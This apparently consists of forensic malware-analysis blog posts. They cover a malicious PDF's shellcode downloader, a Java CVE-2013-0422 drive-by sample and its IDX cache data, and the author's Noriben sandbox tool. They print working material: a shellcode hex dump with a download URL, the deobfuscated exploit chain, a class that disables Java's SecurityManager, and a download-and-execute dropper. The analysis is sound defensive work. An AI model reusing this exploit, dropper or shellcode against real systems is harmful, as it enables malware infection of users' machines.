Now, normally you would look for shellcode obfuscation and API resolutions with IDA Pro or a debugger like Immunity/OllyDbg, but this one is pretty straightforward. It's a simple downloader with the URL in plain text (similar to a sample I demonstrated to TV's David McCallum... just saying ;)). When I view the data in my favorite free hex editor, HxD, I can see:
    Offset(h)00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

    00000000 4C 20 60 0F 05 17 80 4A 3C 20 60 0F 0F 63 80 4A L `...€J< `..c€J
    00000010 A3 EB 80 4A 30 20 82 4A 6E 2F 80 4A 41 41 41 41 £ë€J0 ‚Jn/€JAAAA
    00000020 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &...............
    00000030 12 39 80 4A 64 20 60 0F 00 04 00 00 41 41 41 41 .9€Jd `.....AAAA
    00000040 41 41 41 41 66 83 E4 FC FC 85 E4 75 34 E9 5F 33 AAAAfƒäüü…äu4é_3
    00000050 C0 64 8B 40 30 8B 40 0C 8B 70 1C 56 8B 76 08 33 Àd‹@0‹@.‹p.V‹v.3
    00000060 DB 66 8B 5E 3C 03 74 33 2C 81 EE 15 10 FF FF B8 Ûf‹^<.t3,.î..ÿÿ¸
    00000070 8B 40 30 C3 46 39 06 75 FB 87 34 24 85 E4 75 51 ‹@0ÃF9.uû‡4$…äuQ
    00000080 E9 EB 4C 51 56 8B 75 3C 8B 74 35 78 03 F5 56 8B éëLQV‹u<‹t5x.õV‹
    00000090 76 20 03 F5 33 C9 49 41 FC AD 03 C5 33 DB 0F BE v .õ3ÉIAü..Å3Û.¾
    000000A0 10 38 F2 74 08 C1 CB 0D 03 DA 40 EB F1 3B 1F 75 .8òt.ÁË..Ú@ëñ;.u
    000000B0 E6 5E 8B 5E 24 03 DD 66 8B 0C 4B 8D 46 EC FF 54 æ^‹^$.Ýf‹.K.FìÿT
    000000C0 24 0C 8B D8 03 DD 8B 04 8B 03 C5 AB 5E 59 C3 EB $.‹Ø.Ý‹.‹.Å«^YÃë
    000000D0 53 AD 8B 68 20 80 7D 0C 33 74 03 96 EB F3 8B 68 S.‹h €}.3t.–ëó‹h
    000000E0 08 8B F7 6A 05 59 E8 98 FF FF FF E2 F9 E8 00 00 .‹÷j.Yè˜ÿÿÿâùè..
    000000F0 00 00 58 50 6A 40 68 FF 00 00 00 50 83 C0 19 50 ..XPj@hÿ...PƒÀ.P
    00000100 55 8B EC 8B 5E 10 83 C3 05 FF E3 68 6F 6E 00 00 U‹ì‹^.ƒÃ.ÿãhon..
    00000110 68 75 72 6C 6D 54 FF 16 83 C4 08 8B E8 E8 61 FF hurlmTÿ.ƒÄ.‹èèaÿ
    00000120 FF FF EB 02 EB 72 81 EC 04 01 00 00 8D 5C 24 0C ÿÿë.ër.ì.....\$.
    00000130 C7 04 24 72 65 67 73 C7 44 24 04 76 72 33 32 C7 Ç.$regsÇD$.vr32Ç
    00000140 44 24 08 20 2D 73 20 53 68 F8 00 00 00 FF 56 0C D$. -s Shø...ÿV.
    00000150 8B E8 33 C9 51 C7 44 1D 00 77 70 62 74 C7 44 1D ‹è3ÉQÇD..wpbtÇD.
    00000160 05 2E 64 6C 6C C6 44 1D 09 00 59 8A C1 04 30 88 ..dllÆD...YŠÁ.0ˆ
    00000170 44 1D 04 41 51 6A 00 6A 00 53 57 6A 00 FF 56 14 D..AQj.j.SWj.ÿV.
    00000180 85 C0 75 16 6A 00 53 FF 56 04 6A 00 83 EB 0C 53 …Àu.j.SÿV.j.ƒë.S
    00000190 FF 56 04 83 C3 0C EB 02 EB 13 47 80 3F 00 75 FA ÿV.ƒÃ.ë.ë.G€?.uú
    000001A0 47 80 3F 00 75 C4 6A 00 6A FE FF 56 08 E8 9C FE G€?.uÄj.jþÿV.èœþ
    000001B0 FF FF 8E 4E 0E EC 98 FE 8A 0E 89 6F 01 BD 33 CA ÿÿŽN.ì˜þŠ.‰o.½3Ê
    000001C0 8A 5B 1B C6 46 79 36 1A 2F 70 68 74 74 70 3A 2F Š[.ÆFy6./phttp:/
    000001D0 2F 75 72 62 61 6E 2D 67 65 61 72 2E 63 6F 6D 2F /urban-gear.com/
    000001E0 34 30 34 5F 70 61 67 65 5F 69 6D 61 67 65 73 2F 404_page_images/
    000001F0 30 32 30 36 2E 65 78 65 00 00 0206.exe..
The URL is a dead giveaway. A well-trained eye can see additional strings appear, typically as four bytes of op-code followed by four bytes of a string, like: codeDATAcodeDATAcodeDATA (Why? Because it takes 4 bytes of code to say "move these 4 bytes of data into a memory register at X location"). A visual analysis shows the command line "regsvr32 -s wpbt.dll" as well as a call to the "urlmon" DLL (practice looking for those). So, from this, we can tell some of the functionality. We know that it at least downloads an executable file from a remote server to the local temporary path (API call to GetTempPathA) and runs it, and that it also potentially installs a DLL onto the system. A view from within IDA Pro would tell more, but I think I've reached enough text with this posting.

To really see what it's doing, I'd chop that code down to the actual functional code, which normally starts after the large block of nulls. In this case, it begins with a somewhat "NOP sled" of 0x4141414141414141. Extract the code and run it through Shellcode2Exe.py, then run the resulting application in OllyDbg. OllyDbg will then resolve the API calls as they're being made, letting you see the calls that include urlmon.URLDownloadToFileA().

That's basically it. A quick one-hour write-up from home using free tools on a malicious PDF sent to my personal account. The end result is pretty boring itself, but I found the JavaScript interesting and decided to publish a few steps for those who were possibly curious about how it worked.

(Pseudo) Exploit Analysis:
Based on a comment that was posted today, I went back to analyze the exploit in the PDF. Exploit analysis isn't my forte by a long shot, but I wanted to show the basic steps of how I approached this file. Also, I was pointed to other blogs that featured this same type of sample, but tried to wave their magic wand of obscurity to say "we manually de-obfuscated it and found...". This isn't rocket science, no need to keep it secret... The magic occurred elsewhere in the PDF, in something we'll call "Object 18":

    18 0 obj
    <</Rect [12.47 5.21 6.13.6.7] /Subtype/Widget /Ff 65536 /T (qwe123b[0]) /MK <</TP 1>> /Type/Annot /FT/Btn /DA (/CourierStd 10 Tf 0 g) /Parent 19 0 R /TU (qwe123b) /P 1 0 R /F 4>>endobj
This object (which is called by 19, which is called by 20, which is called by 21, which is called by 23 (the root object))  draws a rectangle and loads a widget in it named "qwe123b[0]", which refers basically to the output of the JavaScript. So, let's go back to our deobfuscated JavaScript and work backwards:
    qwe123b.rawValue=_ll1
There's our return value... _ll1. So, let's piece together what's returned:
    _ll1=_j8+_j9+_ll0+_j5;
_j8 is a standard block of text, "SUkqADggAABB".
_j9 calls _I2() to build a 10,984-character block of repeated "QUFB".
_ll0 is another standard block of text.
_j5 is another standard block of text.
So, I would combine all of these values to see what the output would be. The magic behind it all is that the large block of text this produces is simply a string of Base64 encoded data. Upon decoding, you'll see the magic first few bytes (from _j8):
    Offset(h)00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

    00000000 49 49 2A 00 38 20 00 00 41                       II*.8 ..A
These bytes are the file header of a TIFF graphic image. Oh, and that long run of "QUFB"s? It Base64 decodes to repeated 0x414141. That reduces our search. At this point, we would debug Acrobat to follow the flow of data through the application, setting breakpoints at areas that handle graphic images. But, as this isn't a 0-day, a few basic Google searches lead us to a few possible culprits, all of which are basically libTiff vulnerabilities. There are numerous ones, but I don't feel that I'm qualified to pinpoint an exact one.
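Both claims are easy to verify with a quick sketch (only the _j8 prefix and one "QUFB" block are decoded here):

import base64
import binascii

# The _j8 prefix decodes to the TIFF magic bytes ("II*"), and each
# "QUFB" block decodes to 0x414141.
print(binascii.hexlify(base64.b64decode('SUkqADggAABB')))  # 49492a003820000041
print(binascii.hexlify(base64.b64decode('QUFB')))          # 414141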

Java Malware - Identification and Analysis


DIY Java Malware Analysis


Parts Required: AndroChef ($) or JD-GUI (free), My Java IDX Parser (in Python), Malware Samples
Skill Level: Beginner to Intermediate
Time Required: Beginner (90 minutes), Intermediate (45 minutes), Advanced (15 minutes)

Java has once again been thrown into the limelight with another resurgence of Java-based drive-by malware attacks reminiscent of the large-scale BlackHole exploit kits seen in early 2012. Through our cmdLabs commercial incident response and forensics team at Newberry Group, I've had the opportunity to perform numerous investigations into data breaches and financial losses due to such malware being installed.
Based on my own experience with Java-related infections, and seeing some very lackluster reports produced by others, I've decided to write a simple how-to blog post on basic Java malware analysis from a forensic standpoint. Everyone has their own process; this is basically mine. It takes the approach of examining the initially downloaded files, seen as Java cached JAR and IDX files, examining the first-stage Java malware to determine its capabilities, and then looking for the second-stage infection.

Java Cached Files

One critical step in any Java infection is to check for files within the Java cache folder. This folder stores a copy of each and every Java applet (JAR) downloaded as well as a metadata file, the IDX file, that denotes when the file was downloaded and from where. These files are stored in the following standard locations:
  • Windows XP: %AppData%\Sun\Java\Deployment\Cache
  • Windows Vista/7/8: %UserProfile%\AppData\LocalLow\Sun\Java\Deployment\Cache
This folder contains numerous subdirectories, each corresponding to an instance of a downloaded file. By sorting the directory recursively by date and time, one can easily find the relevant files to examine. These files will be found auto-renamed to a random series of hexadecimal values, so don't expect to find "express.jar", or whatever file name the JAR was initially downloaded as.

Java IDX Files


In my many investigations, I've always relied upon the Java IDX files to backup my assertions and provide critical indicators for the analysis. While I may know from the browser history that the user was browsing to a malicious landing page on XYZ.com, it doesn't mean that the malware came from the same site. And, as Java malware is downloaded by a Java applet, there will likely be no corresponding history for the download in any web browser logs. Instead, we look to the IDX files to provide us this information.

The Java IDX file is a binary-structured file, but one that is reasonably readable with a basic text editor. Nearly all of my analysis is from simply opening this file in Notepad++ and mentally parsing out the results. For an example of this in action, I would recommend Corey Harrell's excellent blog post: "(Almost) Cooked Up Some Java". This textual data is of great interest to an examiner, as it notes when the file was downloaded from the remote site, what URL the file originated from, and what IP address the domain name resolved to at the time of the download.

I was always able to retrieve the basic text information from the file, but the large blocks of binary data always bugged me. What data was I missing? Were there any other critical indicators in the file left undiscovered?

Java IDX Parser


At the time, no one had written a parser for the IDX file. Harrell's blog post above provided the basic text structure of the file for visual analysis, and a search led me to a Perl-based tool written by Sploit that parsed the IDX for indicators to output into a forensic timeline file: Java Forensics using TLN Timelines. However, neither delved into the binary analysis. Facing a new lifestyle change, and a drastic home move, I found myself with a lot of extra time on my hands for January/February, so I decided to sit down and unravel this file. I made my mark by writing my initial IDX file parser, which only carved the known text-based data, and placed it up on GitHub to judge interest.




On a side note, I had hoped for this to be a personal challenge to unwind on while moving. Upon posting my initial program I packed away my PC and began moving to my new home. Two weeks later, after digging out and setting up, I found that the file was used as a catalyst for some awesome analysis. I applaud the great effort and documentation made by Mark Woan and Joachim Metz.

In the weeks since the initial release I added numerous features and learned more about the structure. I learned that the file is composed of five distinct "sections", as named by Java:
  • Section 1 - Basic metadata on the status of the download. Was it completed successfully? What time was it completed at? How big is the IDX file?
  • Section 2 - Download data. This is the "text" section of the file and contains numerous length-prefixed strings situated in Field:Value pairs (see the sketch after this list)
  • Section 3 - Compressed copy of the JAR file's MANIFEST document
  • Section 4 - Code Signer information, in Java Serialization form
  • Section 5 - Additional data (Haven't found a file yet with this)
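For the curious, the Section 2 strings appear to be written with Java's DataOutputStream.writeUTF(): a two-byte big-endian length followed by the string bytes. That is an assumption on my part based on the layout; see Mark Woan's and Joachim Metz's format documentation for the authoritative structure. A minimal sketch of reading one such string:

import struct

def read_utf(data, offset):
    # Assumes writeUTF() layout: 2-byte big-endian length, then the string bytes.
    (length,) = struct.unpack('>H', data[offset:offset + 2])
    value = data[offset + 2:offset + 2 + length].decode('utf-8', 'replace')
    return value, offset + 2 + length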
It's somewhat difficult to measure the forensic value of the data recovered from sections 3 and 4. The Manifest does give information on what version of Java the applet was compiled with, and for, but is just a duplicate if the JAR is still present on the infected system. Section 4 data typically provided scant details, sometimes just the character "0" or just null bytes, on Java malware I've analyzed. Instead of attempting interpretation on this data, I've just displayed it to the screen for our posterity to unravel.

When put into use on the sample we're analyzing, here are the results shown from my IDX Parser.

E:\Development\Java_IDX_Parser>idx_parser.py e:\malware\java_XXX\1c20de82-1678cc50.idx
Java IDX Parser -- version 1.3 -- by @bbaskin
IDX file: e:\malware\java_XXX\1c20de82-1678cc50.idx (IDX File Version 6.05)

[*] Section 2 (Download History) found:
URL: http://80d3c146d3.gshjsewsf.su:82/forum/dare.php?hsh=6&key=b30a14e1c597bd7215d593d3f03bd1ab
IP: 50.7.219.70
<null>: HTTP/1.1 200 OK
content-length: 7162
last-modified: Mon, 26 Jul 2001 05:00:00 GMT
content-type: application/x-java-archive
date: Sun, 13 Jan 2013 16:22:01 GMT
server: nginx/1.0.15
deploy-request-content-type: application/x-java-archive


[*] Section 3 (Jar Manifest) found:
Manifest-Version: 1.0
Ant-Version: Apache Ant 1.8.3
X-COMMENT: Main-Class will be added automatically by build
Class-Path:
Created-By: 1.7.0_07-b11 (Oracle Corporation)


[*] Section 4 (Code Signer) found:
[*] Found: Data block.  Length: 4
Data:                   Hex: 00000000
[*] Found: Data block.  Length: 3
Data: 0                 Hex: 300d0a
Analysis of the infected file system showed activity to a completely different web site, and then a sudden infection. By timelining the events, I found the missing download information from the Java malware in the IDX file, from a domain not found elsewhere on the system.
There are a number of Java IDX parsers out there, which emerged quickly after I first published mine. Many provide good starting ground for getting obvious artifacts from the file, but I do recommend trying them all to see which works best for you.


Java Malware Analysis


With the relevant Java malware file identified, I began the analysis of the file. Typically, many examiners use a free decompiler like JD-GUI, which is a pretty useful tool for the cost. However, I've found in many cases that JD-GUI cannot appropriately decompile most of the file and ends up disassembling much of it. This means that the analysis isn't done on clean Java code, but instead on Java op-codes. That is certainly possible, and I gave a presentation to the Northern Virginia Hackers group this last year on how to do it, but it's a lot of tiresome effort. Instead, after a thorough review of the current tools available, I've switched to AndroChef for all of my analysis. It still misses some, but it decompiles more code than other tools can.

Before going in, VirusTotal reports that this file flagged 2/46 engines for CVE-2013-0422. That gives us a clue of what exploit code to search for.

Using AndroChef on the malware file I was able to retrieve the Java code, which was contained across five separate Class files. These Class files alone are compiled modules, but data can traverse across them, requiring an examiner to analyze all of them simultaneously. For me, the easiest method is to copy and paste them all into one text document, to edit with Notepad++. This allows me to sweep-highlight a variable and quickly find every other location where that variable is in use. After a cursory analysis, I try to determine, at a high level, the purpose of each class:
  • Allaon.class - Contains all of the strings used in the malware
  • Lizixk - Contains the dropper code
  • Morny - Contains the text decryption routines
  • Rvre - Contains an embedded Java class
  • Zend - Contains the main code
The JAR also contained the standard META-INF/MANIFEST file, which matched the results shown from my IDX parser.

If you don't want to decode these files yourself, I have them available here for download.

The text within Allaon.class is obfuscated by inserting the text "Miria_)d" throughout each string, as shown below:

   public static String Gege = "fiesta".replace("Miria_)d", "");
   public static String Gigos = "sMiria_)dun.iMiria_)dnvoke.aMiria_)dnon.AMiria_)dnonMiria_)dymousClasMiria_)dsLoMiria_)dader".replace("Miria_)d", "");
   public static String Momoe = "f" + "ilMiria_)d///".replace("Miria_)d", "e:");
   public static String BRni = "j" + "avMiria_)da.io.tmMiria_)dpdiMiria_)dr".replace("Miria_)d", "");
   public static String Tte3 = "heMiria_)dhda.eMiria_)dxe".replace("Miria_)d", "");
   public static String Contex = "sun.orMiria_)dg.moziMiria_)dlla.javascMiria_)dript.inMiria_)dternal.ConMiria_)dtext".replace("Miria_)d", "");
   public static String ClsLoad = "sun.orMiria_)dg.mozMiria_)dilla.javasMiria_)dcript.inteMiria_)drnal.GeneraMiria_)dtedClaMiria_)dssLoader".replace("Miria_)d", "");
   public static String hack3 = "SophosHack";
   public static String Fcons = "fiMiria_)dndConstrMiria_)ductor".replace("Miria_)d", "");
   public static String Fvirt = "fiMiria_)dndVirtMiria_)dual".replace("Miria_)d", "");
   public static String hack2 = "SophosHack";
   public static String Crtcls = "creaMiria_)dteClasMiria_)dsLMiria_)doader".replace("Miria_)d", "");
   public static String DEfc = "defiMiria_)dneClaMiria_)dss".replace("Miria_)d", "");
By performing a simple find/replace, removing excess code, and globally giving descriptive variable names, the following results are then shown:


   public static String FiestaTag = "fiesta"
   public static String InvokeAnonClassLoader = "sun.invoke.anon.AnonymousClassLoader"
   public static String FileURI = "file:///"
   public static String TempDir = "java.io.tmpdir"
   public static String s_hehda_exe = "hehda.exe"
   public static String MozillaJSContext = "sun.org.mozilla.javascript.internal.Context"
   public static String MozillaJSClassLoader = "sun.org.mozilla.javascript.internal.GeneratedClassLoader"
   public static String hack3 = "SophosHack";
   public static String s_findConstructor = "findConstructor"
   public static String s_findVirtual = "findVirtual"
   public static String hack2 = "SophosHack";
   public static String s_createClassLoader = "createClassLoader"
   public static String s_defineClass = "defineClass"
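The clean-up itself scripts easily. A minimal sketch, run over two of the strings shown above:

# Strip the junk marker out of the obfuscated strings.
MARKER = 'Miria_)d'
samples = [
    "sMiria_)dun.iMiria_)dnvoke.aMiria_)dnon.AMiria_)dnonMiria_)dymousClasMiria_)dsLoMiria_)dader",
    "heMiria_)dhda.eMiria_)dxe",
]
for s in samples:
    print(s.replace(MARKER, ''))   # sun.invoke.anon.AnonymousClassLoader, hehda.exe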
This provides a much better clue as to what is going on, especially as the author was fairly descriptive in his variable naming and didn't randomize the names upon deployment. I can then highlight each variable and find where else in the code that string is being used. I continue to find any such obfuscation throughout the code and remove it a bit at a time, condensing the code back to what it was originally written as.
By following the logic, and renaming variables (globally) when needed, we get a main code function that boils down to:

   public void init() {
      try {
         Rvre.sfgkytoi = this.getParameter("fiesta");
         byte[] Embedded_Java_Class = Rvre.Hex2Bin(Embedded_Java_Class_hex);

JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", (MBeanServer)null, (MBeanServerDelegate)null);
MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();
Object a = null;
Class localClass1 = localMBeanInstantiator.findClass(Allaon.Contex, (ClassLoader)a);
Class localClass2 = localMBeanInstantiator.findClass(Allaon.ClsLoad, (ClassLoader)a);
Lookup lolluk = MethodHandles.publicLookup();
MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[]{MethodType.class});
MethodHandle localMethodHandle1 = lolluk.findVirtual(Lookup.class, Allaon.Fcons, localMethodType1);
MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[]{lolluk, localClass1, localMethodType2});
Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
MethodType ldmet3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[]{String.class, MethodType.class});
MethodHandle localMethodHandle3 = lolluk.findVirtual(Lookup.class, "findVirtual", ldmet3);
MethodType ldmet4 = MethodType.methodType(localClass2, ClassLoader.class);
MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[]{lolluk, localClass1, "createClassLoader", ldmet4});
Object lObj2 = localMethodHandle4.invokeWithArguments(new Object[]{localObject1, null});
MethodType ldmet5 = MethodType.methodType(Class.class, String.class, new Class[]{byte[].class});
MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[]{lolluk, localClass2, "defineClass", ldmet5});

         
         Class lca3 = (Class)localMethodHandle5.invokeWithArguments(new Object[]{lObj2, null, Embedded_Java_Class});
         lca3.newInstance();
         Lizixk.DropFile_Exec();
      } catch (Throwable var22) {
         ;
      }
   }
Much of this is straightforward. However, there is a very large block of "MethodType" and "MethodHandle" calls that are a result of the exploit, CVE-2013-0422. More on this exploit is found on Microsoft's Technet site. The actual runtime magic appears as a single function call to the Lizixk class, which contains a function to retrieve an executable, decode it, drop it to %Temp%, and run it. But how can such malicious logic work? A view at the top of this same function shows us the actual exploit that makes it happen. This function contains a long, obfuscated string value that has the phrase "mMoedl" throughout it, similar to the encoding used by the strings in Allaon. Upon removing this excess text, we can clearly see the first eight bytes as "CAFEBABE":


public static String Ciasio = "CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F0700200100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F457863657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F7572636546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A656374010001420100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100040009000C00030003000B000000120004000000080004000B0009000C000D000D000C000000160002000D0000000D000E00010000000E000F001000000011000000100002FF000C00010700120001070013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B000000002000B0000000A00020000001000040011000C0000000C00010000000C000F0010000000010016000000020017"
This is the magic value, in hex, for compiled Java code. That tells us what we're looking at: the string needs to be converted from hex back to binary and saved to a file. Doing so produces another class file that we can decompile with AndroChef, producing the following code:


import java.security.AccessController;
import java.security.PrivilegedExceptionAction;
public class B implements PrivilegedExceptionAction {
   public B() {
      try {
         AccessController.doPrivileged(this);
      } catch (Exception var2) {
         ;
      }
   }
   public Object run() {
      System.setSecurityManager((SecurityManager)null);
      return new Object();
   }
}
Wow! Such simple code, but you can see a few items that are glaring. First off, this file was flagged by VirusTotal as 1/46 for Java/Dldr.Pesur.AN. This code really just changes the local security privileges of the parent code, giving it the ability to drop and execute the second-stage malware.
With everything analyzed, we're left with the function call into class Lizixk to drop and run the malware. Now that the exploit has launched and privileges have been escalated, this dropper routine is run:


public class Lizixk {
   public static String TempDir = getProperty("java.io.tmpdir");
   static InputStream filehandle;
   public static void DropFile_Exec() throws FileNotFoundException, Exception {
      if(TempDir.charAt(TempDir.length() - 1) != "\\") {
         TempDir = TempDir + "\\";
      }
      String Hehda_exe = TempDir + "hehda.exe";
      FileOutputStream output_filehandle = new FileOutputStream(Hehda_exe);
      DownloadEXE();
      int data_size;
      for(byte[] rayys = new byte[512]; (data_size = filehandle.read(rayys)) > 0; rayys = new byte[512]) {
         output_filehandle.write(rayys, 0, data_size);
      }
      output_filehandle.close();
      filehandle.close();
      Runtime.getRuntime().exec(Hehda_exe);
   }
   public static void DownloadEXE() throws IOException {
      URL fweret = new URL(Morny.data_decode(fiesta));
      fweret.openConnection();
      filehandle = fweret.openStream();
   }
}
There are two routines in play here, renamed by me: DropFile_Exec() and DownloadEXE(). The first is called by Class Zend and is responsible for determining the Temporary folder (%Temp%) and creating a file named "hehda.exe". It then calls DownloadEXE(). This latter routine retrieves the embedded HTML data for the parameter "fiesta", decodes it with a custom routine to retrieve a URL, then downloads that file to "hehda.exe".

After this, the file is run and the second-stage malware begins. This is standard operating procedure, as the second-stage typically belongs to the operator who purchased the exploit kit and wants their malware installed. They just require the use of the first-stage (Black Hole) to get it running on the system.


Custom Data Encoding


I have a deep love for custom encoding and encryption routines, so even without the raw data, I analyzed the encoding for the URL, found in Class Morny:

   public static String data_decode(String web_data) {
      int byte_pos = 0;
      web_data = (new StringBuffer(web_data)).reverse().toString();
      String decoded_data = "";
      web_data = web_data.replace("a-nytios", "");
      for(int i = 0; i < web_data.length(); ++i) {
         ++byte_pos;
         if(byte_pos == 3) {
            decoded_data = decoded_data + web_data.charAt(i);
            byte_pos = 0;
         }
      }
      return decoded_data;
   }
There are a few small routines in play here. The encoded data is retrieved from the web site HTML, then put into reverse order. It removes all instances of the text "a-nytios" from the data, just like the Java did with its embedded data. It then keeps every third byte of the data, discarding the rest. For example:



Encoded: z1eZmxsoityn-a7aeeF.pxlhsiTxvR7ejI/H4soityn-amuto6IceE.yre9EtcNii7scKdtsoityn-aJazybPT.ZSwFqsoityn-awNSwPd/p8/Mu:YVpsoityn-aEQtRrtH4soityn-ahgR
Reversed: Rgha-nytios4HtrRtQEa-nytiospVY:uM/8p/dPwSNwa-nytiosqFwSZ.TPbyzaJa-nytiostdKcs7iiNctE9ery.EecI6otuma-nytios4H/Ije7RvxTishlxp.Feea7a-nytiosxmZe1z
Phrase-removed: Rgh4HtrRtQEpVY:uM/8p/dPwSNwqFwSZ.TPbyzaJtdKcs7iiNctE9ery.EecI6otum4H/Ije7RvxTishlxp.Feea7xmZe1z
Every third byte: http://www.badsite.com/evil.exe


One reason I call this out is because there's little reporting on the routine. It's common across multiple variants of BlackHole/Redkit/fiesta/etc. You understand it better by reading through the code (and recreating it in Python/Perl) than guessing your way through it (see "llobapop" ;))
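In that spirit, here is a quick Python recreation of Morny.data_decode(), run against the example string above (it prints the same sanitized URL):

def data_decode(web_data):
    # Reverse the string, strip the junk phrase, then keep every third
    # character (mirroring the byte_pos counter in the Java routine).
    web_data = web_data[::-1].replace('a-nytios', '')
    return ''.join(web_data[i] for i in range(2, len(web_data), 3))

encoded = ('z1eZmxsoityn-a7aeeF.pxlhsiTxvR7ejI/H4soityn-amuto6IceE.yre9EtcNii7'
           'scKdtsoityn-aJazybPT.ZSwFqsoityn-awNSwPd/p8/Mu:YVpsoityn-aEQtRrtH4'
           'soityn-ahgR')
print(data_decode(encoded))   # http://www.badsite.com/evil.exe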

Second-Stage Malware Analysis


The end result of this Java malware is to place a single executable onto your system and run it. The malware doesn't even know where that executable is to come from, it relies upon an external source ("fiesta" parameter) to tell it where to download it from. This is how we separate the various stages of an infection. The Java first-stage is the Trojan horse to breach the walls, while hehda.exe is the Greek army hidden within.
Through the infection, we found that the second-stage malware was a variant of the ZeroAccess Rootkit, a pretty nasty piece of work. However, our time has grown long on this post so I will leave analysis of that file for the next one. We will reconvene to discuss ZeroAccess, how it entrenches itself onto the system, how IDA Pro likes to puke on it, and how Windows undocumented API calls give it so much power over your computer.

Noriben - Your Personal, Portable Malware Sandbox


Announcing Noriben


Noriben is a Python-based script that works in conjunction with Sysinternals Procmon to automatically collect, analyze, and report on runtime indicators of malware. In a nutshell, it allows you to run your malware, hit a keypress, and get a simple text report of the sample's activities.

Noriben is an ideal solution for many unusual malware instances, such as samples that will not run within a standard sandbox environment. These files may require command line arguments, contain VMware or OS detection that has to be actively debugged around, or use extremely long sleep cycles. These issues go away with Noriben. Simply run Noriben, then run your malware in whatever way makes it work. If there is active protection, run it within OllyDbg/Immunity while Noriben is running and bypass any anti-analysis checks. If it has activity that changes over days, simply kick off Noriben and the malware for a long weekend and process your results when you return to work.

Noriben only requires Sysinternals procmon.exe. You may optionally first tailor Procmon to your particular VM, a step that is unique to each individual person and their environment, in order to filter out the noise of benign activity from logs. Alternatively, the filtering within Procmon can be kept sparse and you could instead place numerous filters from within Noriben to filter out the noise. (My personal preference is to perform moderate filtering from within Procmon and the rest from Noriben, which allows me to quickly remove filters for specific malware that likes to mimic benign services.) If you create Procmon filters, simply save the file as ProcmonConfiguration.pmc and save it in the same folder as Noriben.py

Simply run Noriben and wait for it to setup. Once prompted, run your malware in another window. When the malware has reached a point of activity necessary for analysis, stop Noriben by pressing Ctrl-C. Noriben will then stop the logging, gather all of the data, and process a report for you. It then generates three files, all timestamped: a Procmon PML database, a text CSV document, and a text TXT file. The PML and CSV files constitute the main source of activity, with the TXT being the final report made after applying filters. Found too many false positives in your report? Simply delete the TXT file, add filters to Noriben.py directly, and rerun it with the "-r <filename>.csv" option to re-run analysis from the CSV.

Noriben - Origins


After many years in the Information Security industry, and training forensic investigators from every walk of life, I tend to hear the same complaints from most analysts. There is simply too much work to perform with not enough of a budget to purchase adequate tools. This is a growing concern for those in the malware analysis field, where the amount of malicious files comes in at a pace faster than most can keep up with.

To counter this problem, many organizations have found themselves putting a greater weight on automated tools. The industry targeting this particular segment has exploded in the past two years, with multiple large companies coming out with a large number of tools to help strained teams, but at large financial costs.

As a resourceful analyst on a small team, usually called in to provide surge support for others, I've had to find ways to work smarter with the tools I have. While setting up a Cuckoo sandbox server is a free and preferred method for quick analysis, I needed something more nimble and portable. This issue came up when I assisted on a response and was given a laptop upon arrival, one that lacked most basic malware tools. Working alongside a team of junior analysts, we had a large mountain of files to analyze, with no ready access to the Internet to analyze files quickly. The answer came with using simple tools already on the network, used by the system administrators, namely Sysinternals Procmon. Procmon is already in the arsenal of most malware analysts as a way to monitor system activity during dynamic analysis. By using native functionality within Procmon, a comma-delimited (CSV) file can be generated, which was then analyzed through specifically tailored grep searches. That effort turned into a way of automating the process to be used by dozens of people. After months of personal usage and testing, the end result was Noriben.

Noriben in Action


In my last blog post, I showed one of my recent tools for parsing Java IDX files, a forensic byproduct of Java-based malware infections. In that post we talked about the first-stage malware attack which was used solely to drop a file named hehda.exe to the user's Temporary folder. What was that executable and what does it do? Let's turn to Noriben:


Place your Noriben files (Noriben.py, procmon.exe, and optionally ProcmonConfiguration.pmc) into any standard Windows virtual machine. Then copy your malware to the VM.
Run Noriben and you will receive the following text:




After a while I see the original malware file, hehda.exe, disappear from my desktop. I wait about a minute and then press Ctrl-C to stop the scan. The following text is then displayed:



Notepad then automatically opens the resulting text report, which shows a lot of data. Because the output is so large, it is available at the following link:

Original Report

Now, this could be better. So, I adjust my filters by adding in the items that don't interest me. I do this on the fly with this instance of Noriben.py within the VM, knowing that the changes are particular to this VM and that the new filters will be erased when I revert my snapshot. I then rescan my file by using "Noriben.py -r", as shown below:



The resulting report is much easier to process:

Filtered Report

From this, we can see a few highly notable items. The process events show hehda.exe being executed and then spawning cmd.exe:

[CreateProcess] Explorer.EXE:1432 > "C:\Documents and Settings\Administrator\Desktop\hehda.exe" [Child PID: 2520]
[CreateProcess] hehda.exe:2520 > "C:\WINDOWS\system32\cmd.exe" [Child PID: 3444]

By following cmd.exe's PID, we can see it is later responsible for deleting hehda.exe.
